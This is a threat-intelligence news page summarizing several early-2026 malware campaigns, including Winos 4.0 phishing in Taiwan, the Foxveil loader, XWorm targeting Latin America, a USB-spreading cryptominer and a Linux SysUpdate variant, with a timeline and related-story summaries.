Multiple Malware Campaigns Abuse Phishing and Legitimate Cloud Services to Compromise Windows and Linux Systems
Reporting describes several unrelated but contemporaneous malware operations targeting both Windows and Linux environments. In Taiwan, FortiGuard Labs observed targeted phishing using tax and e-invoice lures to deliver Winos 4.0 (ValleyRat) and plugins, with delivery chains including malicious .LNK files, DLL sideloading, and BYOVD using the vulnerable driver wsftprm.sys, supported by rapidly rotating domains and cloud-hosted infrastructure that reduces the effectiveness of static blocklists. Separately, Cato CTRL reported a new Windows loader, Foxveil, that stages and retrieves shellcode via trusted platforms (Cloudflare Pages, Netlify, and Discord attachments) and executes payloads using techniques including Early Bird APC injection (often into a fake svchost.exe) or self-injection, while persisting via Windows services or masqueraded binaries dropped into SysWOW64.
Additional reporting covers distinct campaigns in other regions and platforms. A LATAM-focused intrusion chain uses fake bank receipt lures (double-extension such as .pdf.js) to deliver XWorm v5.6, employing oversized/obfuscated JavaScript, WMI-based process creation (Win32_Process) to launch hidden PowerShell, and abuse of a hardcoded Cloudinary URL for staging—capabilities consistent with credential theft and enabling follow-on ransomware. Trellix analysis described a separate Monero cryptomining operation distributed via pirated software installers that propagates through USB/external drives to reach even air-gapped systems, using multi-component “watchdog” self-healing behavior and aggressive defense-evasion. On Linux, LevelBlue detailed a new SysUpdate variant (packed ELF64) that performs host reconnaissance and uses strong C2 encryption; researchers built a Unicorn Engine-based emulation tool to reproduce key generation/encryption routines and decrypt captured C2 traffic for investigation and detection engineering.
Timeline
Feb 20, 2026
FortiGuard attributes Taiwan Winos activity to Silver Fox subgroup
FortiGuard attributed the Taiwan-focused Winos 4.0 campaigns with high confidence to a specialized subgroup within the Silver Fox APT. The attribution was based on overlapping infrastructure, identical driver-abuse techniques, domain registration artifacts, and a recurring development MachineID.
Feb 20, 2026
FortiGuard reports Winos 4.0 phishing campaigns targeting Taiwan
FortiGuard Labs disclosed targeted phishing campaigns in Taiwan using tax-themed lures to deliver Winos 4.0 (ValleyRat) and follow-on plugins. The campaigns use rotating domains, cloud-hosted archives, DLL sideloading, UAC bypass, and a vulnerable driver to disable security products and run memory-resident modules.
Feb 19, 2026
Researchers disclose advanced air-gap-bridging cryptomining malware
Trellix publicly described the cryptomining campaign's controller/payload separation, BYOVD privilege escalation, and CPU register tampering to improve Monero RandomX mining performance by an estimated 15–50%. The report also highlighted its ability to spread through removable media and bridge air-gapped systems.
Feb 19, 2026
XWorm campaign targets Latin American businesses with fake receipts
Researchers reported a multi-stage campaign targeting Brazilian and broader Latin American businesses with fake Bradesco bank receipt lures delivering XWorm v5.6. The infection chain uses a .pdf.js dropper, Cloudinary-hosted steganographic content, in-memory .NET loading, scheduled-task persistence, and CasPol.exe injection.
Feb 18, 2026
Researchers develop tool to decrypt SysUpdate Linux C2 traffic
To analyze the new SysUpdate variant, researchers built a Unicorn Engine-based emulation toolchain that reproduces the malware's key generation and decryption routines. The method enables defenders to decrypt intercepted C2 traffic from this and future variants by extracting updated keys from memory.
Feb 18, 2026
LevelBlue discovers new Linux SysUpdate variant
During a DFIR engagement, analysts found a suspicious packed ELF64 binary in a client environment and attributed it with high confidence to a new Linux-targeting SysUpdate variant. The malware masquerades as a system service, performs reconnaissance, and establishes encrypted multi-protocol C2 communications.
Feb 18, 2026
Researchers report Foxveil and its two variants
Security researchers publicly reported the newly discovered Foxveil loader and described two variants that differ in shellcode execution and injection methods. They also documented persistence via Windows services or lookalike executables in SysWOW64 and a runtime string-mutation feature to hinder analysis.
Dec 23, 2025
Cryptomining malware reaches built-in cleanup date
The cryptomining malware contains a hardcoded check for December 23, 2025, after which it switches to a cleanup mode that terminates components and deletes dropped files. This suggests the operators planned a defined campaign lifecycle.
Nov 1, 2025
Trellix identifies USB-spreading cryptomining campaign
Trellix said it identified a multi-stage cryptomining campaign in late 2025 that propagates through USB and external drives, including into air-gapped environments. The malware uses watchdog processes, kills security tools, and leverages the vulnerable WinRing0x64.sys driver for kernel access.
Aug 1, 2025
Foxveil malware loader activity begins
CATO CTRL assessed that the previously undocumented Foxveil malware loader has been active since August 2025. The loader abuses Cloudflare Pages, Netlify, and Discord attachments to stage shellcode and evade reputation-based defenses.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Vulnerabilities
Threat Actors
Organizations
Sources
Related Stories
Credential-Theft Malware Campaigns Targeting Windows via Social Engineering and Trusted Services
Multiple reports describe **active malware campaigns targeting Windows users** with a focus on **credential, session, and wallet theft** delivered through social engineering and abuse of legitimate services. **CharlieKirk Grabber**, a Python infostealer packaged with *PyInstaller*, is distributed via phishing, cracked software, cheats, and social-media lures; it kills browser processes (via `TASKKILL`) to access credential stores, collects passwords/cookies/autofill/Wi‑Fi data, zips the loot, uploads it to *GoFile*, and relays the download link to operators via **Discord webhooks** or **Telegram bots**. Separately, attackers are buying **Facebook ads** impersonating Microsoft to drive victims to cloned Windows 11 download pages on lookalike domains (e.g., `ms-25h2-update[.]pro`), delivering a malicious installer that steals saved passwords, browser sessions, and **cryptocurrency wallet** data; the campaign uses **geofencing/sandbox evasion** to show benign content to data-center IPs while serving malware to likely end users. Other contemporaneous activity highlights broader Windows-targeted intrusion tradecraft and adjacent threats. FortiGuard Labs reported **Winos 4.0 (ValleyRat)** phishing campaigns in Taiwan using tax and e-invoice lures, with delivery chains including malicious **LNK** downloaders, **DLL sideloading**, and **BYOVD** using the vulnerable driver `wsftprm.sys`, supported by rapidly rotating domains and cloud hosting. In LATAM, a fake bank-receipt lure delivers **XWorm v5.6** via a `.pdf.js` double-extension WSH dropper that uses junk-padding and Unicode obfuscation, then reconstructs and runs PowerShell (spawned via WMI) and abuses trusted hosting (e.g., Cloudinary) for later stages—enabling credential theft and potential ransomware follow-on. Additional reporting covered a USB-propagating **Monero cryptomining** operation capable of crossing air-gapped environments, a new Linux **SysUpdate** variant with encrypted C2 traffic (and a Unicorn Engine-based decryption approach developed during DFIR), and the **Foxveil** loader abusing **Cloudflare Pages, Netlify, and Discord** to stage shellcode and persist via services or *SysWOW64* masquerading—these are separate threats but reinforce the trend of attackers blending into trusted infrastructure and common user workflows.
1 months ago
Multiple APT and malware campaigns abusing phishing, cloud services, and signed binaries
Reporting across multiple research teams described a surge of distinct, ongoing intrusion campaigns rather than a single unified incident. **Check Point** reported on **Silver Dragon**, a Chinese-aligned activity cluster assessed as operating under the broader **APT41** umbrella, targeting organizations in **Southeast Asia and Europe** (notably government) via exploitation of public-facing servers and phishing, then deploying **Cobalt Strike**, **DNS tunneling**, and a new Google Drive–based backdoor (**GearDoor**) alongside custom tools (**SSHcmd** and **SliverScreen**) for remote access and screen capture. **Microsoft** detailed separate February 2026 phishing campaigns by an unknown actor that used meeting/invoice-style lures and **EV code-signed** malware (certificate issued to **TrustConnect Software PTY LTD**) masquerading as common workplace apps (e.g., `msteams.exe`, `adobereader.exe`, `zoomworkspace.clientsetup.exe`) to install legitimate **RMM** tooling (**ScreenConnect**, **Tactical RMM**, **Mesh Agent**) for persistent access and lateral movement. Other reporting highlighted additional, unrelated campaigns and tradecraft: **ClearSky** described a Russian-aligned operation targeting **Ukraine** using a phishing-delivered ZIP/HTA chain that drops a .NET loader (**BadPaw**) and backdoor (**MeowMeow**) with **.NET Reactor** obfuscation, parameter-gated execution, and sandbox/tooling checks (with low-confidence linkage to **APT28**). **Cofense**-reported activity (via SC Media) showed phishing that weaponizes **Windows File Explorer + WebDAV** using URL/LNK shortcuts to pull payloads (notably **AsyncRAT**, **XWorm**, **DcRAT**) and infrastructure including **Cloudflare Tunnel** domains hosting WebDAV servers. **Cisco Talos**-reported **Dohdoor** activity (UAT-10027) targeted US **education and healthcare**, using PowerShell→batch→DLL sideloading via legitimate executables (e.g., `Fondue.exe`, `mblctr.exe`, `ScreenClippingHost.exe`) and **DNS-over-HTTPS** to Cloudflare for C2 discovery and tunneling. Separately, **Zscaler** reported **ScarCruft**’s *Ruby Jumper* campaign using **Zoho WorkDrive** for C2 and removable media components to reach air-gapped systems, while another Zscaler report analyzed **Dust Specter** targeting Iraqi government officials with password-protected RAR delivery and modular implants. **Qianxin XLab** assessed sanctioned infrastructure provider **Funnull** resurfacing to support scam/criminal supply chains and potential **MacCMS**-related supply-chain activity, and **F5 Labs** summarized **APT42**’s **TAMECAT** PowerShell backdoor focused on Edge/Chrome credential theft with C2 over Telegram/Discord/HTTPS and specific file/hash indicators. (A separate Help Net Security item on a Microsoft Defender onboarding tool is product/administrative news and not part of the threat-campaign reporting.)
1 months ago
Windows Malware Campaigns Abusing Trusted Tools and Cloud Hosting for Stealthy Execution
Multiple Windows-focused malware campaigns were reported leveraging *trusted distribution and execution paths* rather than exploiting software vulnerabilities. One campaign attributed to **Larva-25012** disguised proxyware as legitimate *Notepad++* installers distributed via fake cracked-software portals and deceptive ads, primarily impacting South Korea. The payloads were hosted on GitHub and delivered as MSI/ZIP packages containing legitimate components plus malicious DLLs, using **DLL side-loading** and process injection into **Windows Explorer** to deploy proxyware (e.g., **Infatica** and **DigitalPulse**) for **proxyjacking**—monetizing victims’ internet bandwidth by reselling access through their networks. A separate multi-stage Windows malware operation used business-themed lures and weaponized archives containing **LNK** shortcuts to run hidden **PowerShell** with execution-policy bypass, pulling an obfuscated loader from GitHub and using legitimate services (e.g., **Dropbox**) to blend into normal traffic. Fortinet-reported tradecraft included persistence, decoy document generation, and beaconing via the **Telegram Bot API**, followed by defense evasion through abuse of **Defendnot** to disable Microsoft Defender before dropping follow-on payloads such as ransomware, banking trojans, and surveillance tooling. Additional reporting highlighted a broader trend of attackers abusing legitimate infrastructure and admin tooling (including **RMM** software after credential theft) to establish persistent access, while generic “common threats” content provided no incident-specific intelligence.
1 months ago